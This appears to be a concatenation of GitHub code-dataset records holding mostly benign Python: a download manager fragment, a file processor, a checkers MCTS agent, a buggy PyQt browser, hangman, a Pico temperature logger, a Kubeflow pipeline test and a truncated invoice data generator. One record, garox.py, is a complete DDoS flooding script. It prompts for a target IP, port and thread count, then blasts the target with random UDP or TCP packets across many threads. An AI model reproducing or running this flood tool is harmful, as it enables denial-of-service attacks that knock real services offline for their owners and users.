ttk.Style()\n style.theme_use('clam')\n style.configure(\"bar.Horizontal.TProgressbar\", troughcolor='white',\n bordercolor='#16a4fa', background='#16a4fa',\n lightcolor='#16a4fa', darkcolor='#16a4fa')\n progress = ttk.Progressbar(frameProgress,\n style=\"bar.Horizontal.TProgressbar\",\n orient=HORIZONTAL, length=700,\n mode='determinate')\n progress.pack(fill=X, expand=1, padx=10, pady=7)\n\n downloadButton = Button(frameAction, text=\"DOWNLOAD\",\n command=lambda: startDownloading(), width=16,\n height=2, fg=\"white\", bd=0, bg='#16a4fa',\n font=textFont)\n downloadButton.grid(row=1, column=1, padx=20)\n pauseButton = Button(frameAction, state=DISABLED, text=\"PAUSE\",\n width=16, height=2, fg=\"white\", bd=0,\n bg='#16a4fa', font=textFont)\n pauseButton.grid(row=1, column=2, padx=20)\n stopButton = Button(frameAction, state=DISABLED, text=\"STOP\", width=16,\n height=2, fg=\"white\", bd=0, bg='#16a4fa',\n font=textFont)\n stopButton.grid(row=1, column=3, padx=20)\n clearButton = Button(frameAction, text=\"CLEAR\",\n command=lambda: clearReset(), width=16, height=2,\n fg=\"white\", bd=0, bg='#16a4fa', font=textFont)\n clearButton.grid(row=1, column=4, padx=20)\n\n titleBar.bind(\"\", callback)\n titleBar.bind(\"\", showScreen)\n titleBar.bind(\"\", screenAppear)\n\n liftWindow()\n root.mainloop()\n root.quit()\n\n\nif __name__ == \"__main__\":\n AlDownloadManager()\n sys.exit()\n","repo_name":"alankarartist/ALDOWNLOADMANAGER","sub_path":"AlDownloadManager.py","file_name":"AlDownloadManager.py","file_ext":"py","file_size_in_byte":13809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"30619272617","text":"#!/usr/bin/python\n\n'''\nA command line tool for processing usage files.\n'''\n\n\nimport argparse\nimport gzip\nimport json\nimport os\nfrom os import path\nimport urllib2\nimport logging\nimport shutil\n\n\nlog = logging.getLogger(__name__)\n\n\n\ndef get_processed_files(state_path):\n if path.exists(state_path):\n with open(state_path) as fle:\n return set((item.strip() for item in fle))\n else:\n log.debug('\\nstate-file: %s does not exist, will create it\\n', state_path)\n return set()\n\n\ndef get_unprocessed_files(source_dir, state_path):\n processed_files = get_processed_files(state_path)\n\n for root, _, files in os.walk(source_dir, topdown=False):\n for fle in files:\n name, ext = path.splitext(fle)\n\n if ext == '.gz':\n if fle not in processed_files:\n yield (root, fle)\n\n\ndef extract_content(in_path, out_path):\n log.info('\\n\\nextracting %s -> %s\\n', in_path, out_path)\n\n with gzip.open(in_path, 'rb') as in_file:\n with open(out_path, 'wb') as out_file:\n shutil.copyfileobj(in_file, out_file)\n\n\ndef record_file_processed(fle, state_path):\n with open(state_path, 'a') as state_fle:\n state_fle.write(fle + '\\n');\n\n\ndef process_directory(source_dir, output_dir, state_path):\n log.info('\\n\\nprocessing %s\\n\\n', source_dir)\n\n unprocessed_items = get_unprocessed_files(source_dir, state_path)\n\n for (root, fle) in unprocessed_items:\n name = path.splitext(fle)[0]\n\n in_path = path.join(root, fle)\n out_path = path.join(output_dir, name)\n\n extract_content(in_path, out_path)\n\n record_file_processed(fle, state_path)\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description=\"Process a directory containing usage data\")\n\n parser.add_argument(\n '--src', help='source directory', required=True)\n parser.add_argument(\n '--dest', help='destination directory', required=True)\n\n parser.add_argument(\n '--log-level', help='logging level', default='DEBUG')\n\n parser.add_argument(\n '--history', help='history file location', default='DEBUG')\n\n args = parser.parse_args()\n\n logging.basicConfig(level=args.log_level)\n\n state_path = path.join(args.history, 'processed_items.txt')\n\n process_directory(args.src, args.dest, state_path)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"wandabwa2004/stuff","sub_path":"useful-Python/check_new_files.py","file_name":"check_new_files.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"35667254082","text":"#!/usr/bin/python3\nfrom __future__ import print_function\nimport socket\n#from __builtins__ import input\nimport types\n\n\nclass MySocket:\n \"\"\"demonstration class only\n - coded for clarity, not efficiency\n \"\"\"\n\n def __init__(self, sock=None):\n if sock is None:\n self.sock = socket.socket(\n socket.AF_INET, socket.SOCK_STREAM)\n else:\n self.sock = sock\n\n def connect(self, host, port):\n self.sock.connect((host, port))\n\n def mysend(self, msg):\n totalsent = 0\n self.msglen = len(msg)\n msg = msg.encode()\n while totalsent < self.msglen:\n sent = self.sock.send(msg[totalsent:])\n if sent == 0:\n raise RuntimeError(\"socket connection broken\")\n totalsent = totalsent + sent\n\n def myreceive(self):\n chunks = []\n bytes_recd = 0\n while True:\n\n chunk = self.sock.recv(128)\n if chunk == b'':\n raise RuntimeError(\"socket connection broken\")\n chunks.append(chunk)\n bytes_recd = bytes_recd + len(chunk)\n print(chunk)\n if \"\\n\" in chunk.decode():\n break;\n return b''.join(chunks)\nif __name__ == '__main__':\n s = MySocket()\n s.connect(raw_input(\"ip ? >\"),53820)\n r=True\n try:\n while r:\n i = raw_input(\"command ? >\")\n s.mysend(i)\n #s.mysend(\"move up 100\")\n print(\"received in response > \",s.myreceive())\n except KeyboardInterrupt as e:\n r=False\n s.sock.close()\n","repo_name":"Grisou13/pidrone","sub_path":"serveur/tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"33"} +{"seq_id":"7643468925","text":"from random import randint\nfrom BoardClasses import Move, Board\nfrom time import time\nfrom copy import deepcopy\nfrom math import sqrt, log\nfrom operator import attrgetter#, itemgetter\n\nOPPONENT = {1:2, 2:1}\n\ndef get_random_move(board, color) -> Move:\n '''\n Given a board state and color, returns a random move.\n '''\n moves = board.get_all_possible_moves(color)\n index = randint(0, len(moves) - 1)\n inner_index = randint(0, len(moves[index]) - 1)\n return moves[index][inner_index]\n \nclass StudentAI():\n def __init__(self, col, row, p):\n self.col = col\n self.row = row\n self.p = p\n self.board = Board(col, row, p)\n self.board.initialize_game()\n self.color = 2\n self.mcts = MCTS(TreeNode(self.board, self.color, None, None))\n self.total_time_remaining = 479\n self.time_divisor = row * col * 0.5\n self.timed_move_count = 2\n \n def get_move(self, move) -> Move:\n '''\n prune tree with opponent move\n MCTS\n '''\n # Start timer\n start_time = time()\n \n # Check if opponent gave a turn and execute it\n if len(move) != 0:\n self.play_move(move, OPPONENT[self.color])\n # If first move of game, change self.color and make random move\n else:\n self.color = 1\n self.mcts.root = TreeNode(self.board, self.color, None, None)\n\n moves = self.board.get_all_possible_moves(self.color)\n first_move = moves[0][1]\n self.play_move(first_move, self.color)\n return first_move\n \n # Check if only one move is possible\n moves = self.board.get_all_possible_moves(self.color)\n if len(moves) == 1 and len(moves[0]) == 1:\n self.play_move(moves[0][0], self.color)\n return moves[0][0]\n \n # Set up time limit\n time_limit = self.total_time_remaining / self.time_divisor\n \n # MCTS\n move_chosen = self.mcts.search(time_limit)\n self.play_move(move_chosen, self.color)\n \n # Change time divisor\n self.time_divisor -= 0.5 - 1/self.timed_move_count\n self.timed_move_count += 1\n \n # Decrement time remaining and return\n self.total_time_remaining -= time() - start_time\n return move_chosen\n \n def play_move(self, move, color):\n \"\"\"\n Updates board and tree root using Move given,\n either Move we just played or Move given by opponent.\n \"\"\"\n self.board.make_move(move, color)\n \n for child in self.mcts.root.children.items():\n if str(move) == str(child[0]) and child[1] is not None:\n self.mcts.root = child[1]\n self.mcts.root.parent = None\n return\n\n self.mcts.root = TreeNode(self.board, OPPONENT[color], None, None)\n \nclass MCTS():\n def __init__(self, root):\n self.root = root\n \n def search(self, time_limit) -> Move:\n '''\n Performs Monte Carlo Tree Search until time runs out.\n Returns the best move.\n '''\n timeout = time() + time_limit\n \n while time() < timeout:\n # select node from the tree\n node = self.selection(self.root)\n \n # simulate outcome of the game\n temp_board = deepcopy(node.board)\n temp_color = node.color\n win_val = temp_board.is_win(OPPONENT[temp_color])\n \n while not win_val:\n temp_board.make_move(get_random_move(temp_board, temp_color), temp_color)\n win_val = temp_board.is_win(temp_color)\n temp_color = OPPONENT[temp_color]\n \n if win_val == OPPONENT[node.color]:\n win_for_parent = 1\n elif win_val == node.color:\n win_for_parent = -1\n elif win_val == -1:\n win_for_parent = 0\n \n # update values in tree\n node.backpropogate(win_for_parent)\n\n return self.best_child()\n \n def selection(self, node) -> 'TreeNode':\n '''\n Recursively traverses the tree to find a terminal node with the highest UCB value,\n then expands a new unexplored node.\n '''\n if len(node.children) == 0:\n return node\n if None not in node.children.values():\n sorted_children = sorted(node.children.values(), key=attrgetter('ucb_value'), reverse=True)\n return self.selection(sorted_children[0])\n for move, child in node.children.items():\n if child is None:\n node.children[move] = TreeNode(node.board, OPPONENT[node.color], move, node)\n return node.children[move]\n \n def best_child(self) -> Move:\n '''\n Return the move with highest visit count.\n '''\n# if None in self.root.children.values():\n# return get_random_move(self.root.board, self.root.color)\n\n sorted_moves = sorted(self.root.children.items(), key=lambda x: x[1].visit_count, reverse=True)\n return sorted_moves[0][0]\n \nclass TreeNode():\n def __init__(self, board, color, move, parent):\n self.board = deepcopy(board)\n self.color = color\n self.parent = parent\n self.visit_count = 1\n self.wins_for_parent = 0\n self.ucb_value = 0\n \n # Execute nodes' first move\n if move is not None:\n self.board.make_move(move, OPPONENT[self.color])\n\n # Only create children if game is already over \n self.children = dict()\n if self.board.is_win(OPPONENT[self.color]) == 0:\n moves_list = self.board.get_all_possible_moves(self.color)\n for i in range(len(moves_list)):\n for j in range(len(moves_list[i])):\n self.children[moves_list[i][j]] = None\n \n def backpropogate(self, win_for_parent) -> None:\n '''\n REcursively updates statistics for this node and all parents,\n given an outcome of the game.\n (1 is win for the parent, -1 is loss for the parent, 0 is tie,\n decimal values are based on heuristic)\n '''\n self.visit_count += 1\n \n if self.parent:\n self.parent.backpropogate(-win_for_parent)\n \n if win_for_parent > 0:\n self.wins_for_parent += win_for_parent\n elif not win_for_parent:\n self.wins_for_parent += 0.5\n \n # calculate UCB value\n self.ucb_value = self.wins_for_parent/self.visit_count + sqrt(2)*sqrt(log(self.parent.visit_count)/self.visit_count)\n \n# REMOVE THIS BEFORE SUBMITTING #\n# if __name__ == '__main__':\n# import os\n# os.system('python3 main.py 7 7 2 m main.py')\n# REMOVE THIS BEFORE SUBMITTING #\n","repo_name":"ethanlouie/DeepBlueDream","sub_path":"src/checkers-python/StudentAI.py","file_name":"StudentAI.py","file_ext":"py","file_size_in_byte":6926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"38293148694","text":"import sys\r\nimport tkinter as tk\r\nfrom PyQt5.QtCore import QUrl\r\nfrom PyQt5.QtWebEngineWidgets import QWebEngineView, QWebEngineProfile\r\nfrom PyQt5.QtWidgets import QApplication, QVBoxLayout, QHBoxLayout, QLineEdit, QPushButton, QWidget,QMainWindow\r\n\r\nclass PrivateBrowser(QWebEngineView):\r\n def __init__(self):\r\n super().__init__()\r\n profile = self.page().profile()\r\n profile.setHttpCacheType(QWebEngineProfile.NoCache)\r\n profile.setPersistentCookiesPolicy(QWebEngineProfile.NoPersistentCookies)\r\n self.setUrl(QUrl(\"https://www.google.com\"))\r\n self.show()\r\n \r\nclass MainWindow(QMainWindow):\r\n def __init__(self) :\r\n super().__init__()\r\n self.browser = PrivateBrowser()\r\n self.url_bar = QLineEdit()\r\n self.go_button = QPushButton(\"Go\")\r\n self.back_button = QPushButton(\"<-\")\r\n self.forward_button = QPushButton(\"->\")\r\n self.init_ui()\r\n \r\n def init_ui(self):\r\n central_widget = QWidget()\r\n layout = QVBoxLayout()\r\n layout.addwidget(self.browser)\r\n h_layout = QHBoxLayout()\r\n h_layout = addwidget(self.back_button)\r\n h_layout = addwidget(self.forward_button)\r\n h_layout = addwidget(self.url_bar)\r\n h_layout = addwidget(self.go_button)\r\n layout.addLayout(h_layout)\r\n central_widget.setLayout(layout)\r\n self.setCentralWidget(central_widget)\r\n self.go_button.clicked.connect(self.load_url)\r\n self.back_button.clicked.connect(self.browser.back)\r\n self.forward_button.clicked.connect(self.browser.forward)\r\n self.url_bar.returnPressed.connect(self.load_url)\r\n \r\n def load_url(self):\r\n url = self.url_bar.text()\r\n if not url.startswith(\"http\"):\r\n url = \"http://\"+ url\r\n \r\n self.browser.setUrl(QUrl(url))\r\n \r\nif __name__ == '__main__':\r\n from PyQt5.QtWidgets import QApplication, QLabel, QVBoxLayout, QWidget\r\n\r\napp = QApplication([])\r\n\r\n# Create a QWebEngineView widget\r\nweb_view = QWebEngineView()\r\nweb_view.load(QUrl(\"http://www.google.com\"))\r\n\r\n# Create a QVBoxLayout\r\nlayout = QVBoxLayout()\r\n\r\n# Add the web_view widget to the layout\r\nlayout.addWidget(web_view)\r\n\r\nbutton_layout = QHBoxLayout()\r\n\r\nback_button = QPushButton(\"Back\")\r\nback_button.clicked.connect(web_view.back)\r\n\r\nforward_button = QPushButton(\"Forward\")\r\nforward_button.clicked.connect(web_view.forward)\r\n\r\nbutton_layout.addWidget(back_button)\r\nbutton_layout.addWidget(forward_button)\r\n\r\nlayout.addLayout(button_layout)\r\n\r\n# Create a QWidget and set the layout\r\nwidget = QWidget()\r\nwidget.setLayout(layout)\r\n\r\n# Show the widget\r\nwidget.show()\r\n\r\n# Start the event loop\r\napp.exec_()\r\n\r\n\r\n\r\nclass TabbedBrowser(tk.Tk):\r\n def __init__(self, *args, **kwargs):\r\n tk.Tk.__init__(self, *args, **kwargs)\r\n\r\n self.tabs = {}\r\n self.current_tab = None\r\n\r\n # Create a notebook widget to hold the tabs\r\n self.notebook = tk.ttk.Notebook(self)\r\n self.notebook.pack(fill=\"both\", expand=True)\r\n\r\n def add_tab(self, url):\r\n # Create a new tab and add it to the notebook\r\n tab = tk.Frame(self.notebook)\r\n self.notebook.add(tab, text=\"New Tab\")\r\n self.notebook.select(tab)\r\n\r\n # Save the tab in a dictionary to keep track of it\r\n self.tabs[url] = tab\r\n self.current_tab = tab\r\n\r\n def switch_to_tab(self, url):\r\n # Show the selected tab\r\n tab = self.tabs[url]\r\n self.notebook.select(tab)\r\n self.current_tab = tab\r\n\r\nif __name__ == \"__main__\":\r\n browser = TabbedBrowser()\r\n browser.add_tab(\"https://www.google.com\")\r\n browser.mainloop()\r\n","repo_name":"anushkasharma22/Private-Web-Browser","sub_path":"browser.py","file_name":"browser.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"6736637723","text":"\"\"\"\n给定一个排序数组,你需要在原地删除重复出现的元素,使得每个元素只出现一次,返回移除后数组的新长度。\n\n不要使用额外的数组空间,你必须在原地修改输入数组并在使用 O(1) 额外空间的条件下完成。\n\n示例 1:\n\n给定数组 nums = [1,1,2],\n\n函数应该返回新的长度 2, 并且原数组 nums 的前两个元素被修改为\n1, 2。\n你不需要考虑数组中超出新长度后面的元素。\n示例 2:\n\n给定 nums = [0,0,1,1,1,2,2,3,3,4],\n\n函数应该返回新的长度 5, 并且原数组 nums 的前五个元素被修改为\n0, 1, 2, 3, 4。\n你不需要考虑数组中超出新长度后面的元素。\n\n\n思路:\n\n原地替换,将重复位置的元素替换为下个非重复元素。\n\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def removeDuplicates(self, nums: List[int]) -> int:\n # 第一个指针用于更改值\n first = 0\n # 第二个指针用于遍历\n for second in range(len(nums)):\n # 如果和之前记录的值不同\n if nums[first] != nums[second]:\n # 第一个指针先加1\n first += 1\n # 然后赋值\n nums[first] = nums[second]\n return first + 1\n","repo_name":"wulinglin/118-classic-Questions-of-LeetCode","sub_path":"9.双指针+滑动窗口/26-removeDuplicates.py","file_name":"26-removeDuplicates.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"zh","doc_type":"code","stars":11,"dataset":"github-code","pt":"33"} +{"seq_id":"11163105178","text":"\n\"\"\"\nName: Lexie DelViscio\nhw9.py\n\nProblem: This program creates sub functions for a hangman game as well as a command line version of hangman.\n\nregarding Gui function\n # I did work on this, I honestly could not figure out anything past basics stuff and nothing\n felt worth keeping.\n # I wanted to say that I did not want to leave it blank, and I apologize for doing so,\n but I genuinely cannot\n # figure it out as of what we have learned and spent time on in class so far.\nCertification of Authenticity:\nI certify that this assignment is entirely my own work.\n\"\"\"\nfrom random import randint\n\n\ndef get_words(file_name):\n file = open(file_name, 'r')\n file_full = file.readlines()\n words = []\n for i in file_full:\n words += [i]\n return words\n\n\ndef get_random_word(words):\n secret_word = (words[randint(0, len(words)-1)])\n secret_word = secret_word.strip()\n return secret_word\n\n\ndef letter_in_secret_word(letter, secret_word):\n if letter in secret_word:\n return True\n else:\n return False\n\n\ndef already_guessed(letter, guesses):\n if letter in guesses:\n return True\n else:\n return False\n\n\ndef make_hidden_secret(secret_word, guesses):\n guessed = ''\n for i in range(len(secret_word)):\n if secret_word[i] in guesses:\n guessed += secret_word[i] + \" \"\n else:\n guessed += \"_ \"\n guessed = guessed.strip()\n return guessed\n\n\ndef won(guessed):\n if \"_\" in guessed:\n return False\n else:\n return True\n\n\ndef play_graphics(secret_word):\n pass\n # I did work on this, I honestly could not figure out anything past basics stuff and nothing felt\n # worth keeping. I wanted to say that I did not want to leave it blank,\n # and I apologize for doing so, but I genuinely cannot\n # figure it out as of what we have learned and spent time on in class so far.\n\n\ndef play_command_line(secret_word):\n guessed = []\n guesses_remaining = 6\n guessed_right = make_hidden_secret(secret_word, guessed)\n while guesses_remaining >= 0 and not guessed_right == secret_word:\n print(\"already guessed:\", guessed)\n print(\"guesses remaining:\", guesses_remaining)\n print(guessed_right)\n player_guess = input(\"guess a letter: \")\n guessed.append(player_guess)\n if letter_in_secret_word(player_guess, secret_word):\n guessed_right = make_hidden_secret(secret_word, guessed)\n else:\n guesses_remaining -= 1\n if guessed_right.split(\" \") == list(secret_word):\n print(\"winner!\\n\" + guessed_right)\n break\n elif guesses_remaining == 0:\n print(\"sorry, you did not guess the word.\")\n print(\"the secret word was \" + secret_word)\n else:\n print()\n\n\nif __name__ == '__main__':\n pass\n # play_command_line(secret_word)\n # play_graphics(secret_word)\n","repo_name":"Lexie-DelViscio/220","sub_path":"assignments/hw9/hw9.py","file_name":"hw9.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"30351214115","text":"import interactions\nfrom interactions import Client, CommandContext\nfrom utils.mongo_db import MongoDBHandler\n\nembed_color = 0xfd7c42\nhandler = MongoDBHandler('database')\n\nclass Credentials(interactions.Extension):\n def __init__(self, client):\n self.client: Client = client\n\n @interactions.extension_command()\n async def credentials(self, ctx: CommandContext): # Make sure the type of variable is the same \n await ctx.defer(ephemeral=True)\n embed = interactions.Embed(title='Credentials', color=embed_color)\n try:\n r = handler.get_user_credentials(user_id=str(ctx.author.id))\n if r:\n openai_api_key = r['credentials']['openai_api_key']\n embed.add_field(name='OpenAI API Key', value=f'`{openai_api_key}`', inline=True)\n elif r == None:\n embed.add_field(name=\"Error\", value='No credentials set! Use `/set_credentials`.', inline=True)\n await ctx.send(embeds=embed, ephemeral=True)\n except Exception as e:\n print(e)\n\ndef setup(client):\n Credentials(client)\n","repo_name":"Haste171/langchain-chatbot","sub_path":"modules/credentials.py","file_name":"credentials.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":317,"dataset":"github-code","pt":"33"} +{"seq_id":"1166772146","text":"# Author(s) Jeanette Gowen\r\n# Date 5/29/2018\r\n# Title PercentCO2\r\n# Used to calculate Percent CO2\r\n# Code version 1.00\r\n# Type (Python Custom Module)\r\n\r\ndef calcpercentCO2(loitareWeight, loisampleWeight, loiignitionwt550, loiignitionwt950):\r\n\troundperCO2 = None\r\n\tif loitareWeight and loisampleWeight and loiignitionwt550 and loiignitionwt950:\r\n\t\tpercentCO2 = ((loiignitionwt550 - loiignitionwt950)/(loisampleWeight - loitareWeight)) * 100\r\n\t\troundperCO2 = round(percentCO2, 2)\r\n\treturn roundperCO2\r\n\r\n\r\n","repo_name":"michaelelasky/AP_MnCustomScripts","sub_path":"PercentCO2.py","file_name":"PercentCO2.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"15522672605","text":"GROUND_X_LENGTH = 2000\nGROUND_Z_LENGTH = 2000\nOBST_X_LENGTH = 200\nOBST_Z_LENGTH = 200\nROBOT_HEIGHT = 0.1\nNUM_CUBES = 50\nCUBE_SIDE = 4\nNUM_PYRAMIDS = 50\nPYRAMID_SIDE = 6\nWALL_HEIGHT = 20\n\n\nINITIAL_LIFE = 100\nMIN_LIFE = 0\nMAX_TIME = (10**3) #60 sec\nRADIUS = 10\nLIFE_FACTOR = 10\nMOVE_SIZE = 5\n","repo_name":"GuptaVakul101/WoxBot","sub_path":"arena/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"73292192733","text":"import machine\nimport utime\nimport os\n\nsensor_temp = machine.ADC(4)\nconversion_factor = 3.3 / (65535)\nstart_time = utime.time()\n\nled = machine.Pin(25, machine.Pin.OUT)\n\ndef get_temperature():\n reading = sensor_temp.read_u16() * conversion_factor\n temperature = 27 - (reading - 0.706)/0.001721\n return temperature\n\ndef get_filename():\n i = 0\n while True:\n filename = f'temp_{i}.csv'\n try:\n os.stat(filename)\n i += 1\n except OSError:\n break\n return filename\n\n\nfilename = get_filename()\nwith open(filename, 'w') as f:\n f.write('delta t (min),temp (c)\\n')\n\nwhile True:\n delta_t = (utime.time() - start_time) / 60\n temperature = get_temperature()\n with open(filename, 'a') as f:\n f.write(f'{delta_t:.2f},{temperature:.2f}\\n')\n \n led.value(1)\n utime.sleep(0.5)\n led.value(0)\n \n utime.sleep(4.5)\n","repo_name":"Aweymouth13/rp_pico","sub_path":"temp_take.py","file_name":"temp_take.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"17140920193","text":"import kfp.deprecated.dsl as dsl\nfrom kubernetes.client.models import V1EnvVar\n\n\n@dsl.pipeline(\n name='PipelineParams',\n description='A pipeline with multiple pipeline params.')\ndef pipelineparams_pipeline(tag: str = 'latest', sleep_ms: int = 10):\n\n echo = dsl.Sidecar(\n name='echo',\n image='hashicorp/http-echo:%s' % tag,\n args=['-text=\"hello world\"'],\n )\n\n op1 = dsl.ContainerOp(\n name='download',\n image='busybox:%s' % tag,\n command=['sh', '-c'],\n arguments=[\n 'sleep %s; wget localhost:5678 -O /tmp/results.txt' % sleep_ms\n ],\n sidecars=[echo],\n file_outputs={'downloaded': '/tmp/results.txt'})\n\n op2 = dsl.ContainerOp(\n name='echo',\n image='library/bash',\n command=['sh', '-c'],\n arguments=['echo $MSG %s' % op1.output])\n\n op2.container.add_env_variable(\n V1EnvVar(name='MSG', value='pipelineParams: '))\n","repo_name":"kubeflow/pipelines","sub_path":"sdk/python/tests/compiler/testdata/pipelineparams.py","file_name":"pipelineparams.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","stars":3324,"dataset":"github-code","pt":"33"} +{"seq_id":"21266747961","text":"import random\nimport socket\nimport threading\nimport os\n\nos.system(\"clear\")\nprint(\"Attacked by lans\")\nprint(\"gunain dengan bijak\")\nprint(\"welcome back, im here\")\nip = str(input(\" DdosAttackByLANS | Ip:\"))\nport = int(input(\" DdosAttackByLANS | Port:\"))\nchoice = str(input(\" DdosAttackByLANS | yakin ????(y/n):\"))\ntimes = int(input(\" DdosAttackByLANS | Packets:\"))\nthreads = int(input(\" DdosAttackByLANS | Threads:\"))\ndef run():\n\tdata = random._urandom(1024)\n\ti = random.choice((\"[*]\",\"[!]\",\"[#]\"))\n\twhile True:\n\t\ttry:\n\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\t\t\taddr = (str(ip),int(port))\n\t\t\tfor x in range(times):\n\t\t\t\ts.sendto(data,addr)\n\t\t\tprint(i +\" | LANS IN HERE |\")\n\t\texcept:\n\t\t\tprint(\"[!] | yahahaha |\")\n\ndef run2():\n\tdata = random._urandom(16)\n\ti = random.choice((\"[*]\",\"[!]\",\"[#]\"))\n\twhile True:\n\t\ttry:\n\t\t\ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\t\t\ts.connect((ip,port))\n\t\t\ts.send(data)\n\t\t\tfor x in range(times):\n\t\t\t\ts.send(data)\n\t\t\tprint(i +\" tok tok misii !!\")\n\t\texcept:\n\t\t\ts.close()\n\t\t\tprint(\"[*] MISII PAKETTT\")\n\nfor y in range(threads):\n\tif choice == 'y':\n\t\tth = threading.Thread(target = run)\n\t\tth.start()\n\telse:\n\t\tth = threading.Thread(target = run2)\n\t\tth.start()\n","repo_name":"Gang180/garox","sub_path":"garox.py","file_name":"garox.py","file_ext":"py","file_size_in_byte":1206,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"33"} +{"seq_id":"10137593785","text":"import sys\nimport dateutil.relativedelta\nimport random\nimport numpy\n\nfrom time import gmtime, strftime\nfrom datetime import datetime\n\nNODRIVERS = 150\nNOROADS = 10000\nNOCLIENTS = 2500\n\nif __name__ == '__main__':\n\tt1_size = t2_size = 0\n\targs = sys.argv[1:]\n\titerator = 0\n\tfor arg in args:\n\t\tif (arg == '-t1'):\n\t\t\tt1_size = int(args[iterator+1])\n\t\telif (arg == '-t2'):\n\t\t\tt2_size = int(args[iterator+1])\n\t\titerator = iterator + 1\n\tt2_size = t2_size - t1_size\n\t\n\tklienci = open(\"pesel.txt\", \"r\")\n\tklienttable = klienci.readlines()\n\tkierowcy = open(\"pesel_kierowcy.txt\", \"r\")\n\tkierowcytable = kierowcy.readlines()\n\trejestracje = open(\"nr_rejestracyjny.txt\", \"r\")\n\trejestracjetable = rejestracje.readlines()\n\t\n\tfaktury = open(\"insert/faktury_t1.sql\", \"w\")\n\tarkusz_3 = open(\"arkusz/arkusz_3_t1.csv\", \"w\")\n\tarkusz_3.write(\"Data rozpoczęcia zmiany; Data zakończenia zmiany; Numer rejestracyjny pojazdu; PESEL kierowcy\\n\")\n\tCI_created = 0\n\tCI_number_act = 1\n\ttime_now = datetime.now()\n\ttime = time_now - dateutil.relativedelta.relativedelta(years=10)\n\ttime_for_driver_main = time\n\t\n\tfor i in range(0, 2):\n\t\tif (i == 1):\n\t\t\tfaktury.close()\n\t\t\tfaktury = open(\"insert/faktury_t2.sql\", \"w\")\n\t\t\tt1_size = t2_size\n\t\t\tCI_created = 0\n\t\t\tarkusz_3.close()\n\t\t\tarkusz_3 = open(\"arkusz/arkusz_3_t2.csv\", \"w\")\n\t\t\n\t\tCI_act_year = str(time.year)\n\t\tif (t1_size > 0):\n\t\t\twhile(True):\n\t\t\t\tperiod_time_start_main = time_for_driver_main + dateutil.relativedelta.relativedelta(hours=random.randint(0,3))\n\t\t\t\ttime_for_driver_main = period_time_start_main\n\t\t\t\tperiod_time_end_main = period_time_start_main + dateutil.relativedelta.relativedelta(hours=random.randint(3,14))\n\t\t\t\tdrivers_used = numpy.zeros(NODRIVERS)\n\t\t\t\tfor drivers_count in range (0, random.randint(10, int(NODRIVERS/3))):\n\t\t\t\t\tdriver = random.randint(0, NODRIVERS-1)\n\t\t\t\t\twhile(drivers_used[driver] == 1):\n\t\t\t\t\t\tdriver = random.randint(0, NODRIVERS-1)\n\t\t\t\t\tdrivers_used[driver] = 1\n\t\t\t\t\t\n\t\t\t\t\tperiod_time_start = period_time_start_main + dateutil.relativedelta.relativedelta(minutes=random.randint(0,40))\n\t\t\t\t\ttime_for_driver = time_for_driver_main + dateutil.relativedelta.relativedelta(minutes=random.randint(0,40))\n\t\t\t\t\tperiod_time_end = period_time_end_main + dateutil.relativedelta.relativedelta(minutes=random.randint(0,40))\n\t\t\t\t\t\n\t\t\t\t\twhile(time_for_driver < period_time_end):\n\t\t\t\t\t\tstart_time = time_for_driver + dateutil.relativedelta.relativedelta(minutes=random.randint(1,50)) + dateutil.relativedelta.relativedelta(minutes=random.randint(0,20))\n\t\t\t\t\t\tend_time = start_time + dateutil.relativedelta.relativedelta(minutes=random.randint(8,60))\n\t\t\t\t\t\tklient = klienttable[random.randint(0,NOCLIENTS-1)].replace(\"\\n\", \"\")\n\t\t\t\t\t\tkierowca = kierowcytable[driver].replace(\"\\n\", \"\")\n\t\t\t\t\t\tstatus_platnosci = random.randint(0,1)\n\t\t\t\t\t\tkilometry = random.randint(100,5000)/100.0\n\t\t\t\t\t\toplata = kilometry*2 + 6.0\n\t\t\t\t\t\toplata = float(\"{0:.2f}\".format(oplata))\n\t\t\t\t\t\ttrasa = random.randint(0,NOROADS - 1)\n\t\t\t\t\t\t\n\t\t\t\t\t\tif (str(end_time.year) != CI_act_year):\n\t\t\t\t\t\t\tCI_number_act = 1\n\t\t\t\t\t\t\tCI_act_year = str(end_time.year)\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tCI_number = str(CI_number_act) + '/' + str(end_time.year)\n\t\t\t\t\t\tCI_number_act = CI_number_act + 1\n\t\t\t\t\t\t\n\t\t\t\t\t\tto_insert = \"insert into FAKTURY values (\" + \"\\'\" + CI_number + \"\\'\" + \", \" + \"\\'\" + klient + \"\\'\" + \", \" + \"\\'\" + kierowca + \"\\'\" + \", \" + \"\\'\" + str(trasa) + \"\\'\" + \", \" + \"\\'\" + str(oplata) + \"\\'\" + \", \"+ \"\\'\" + 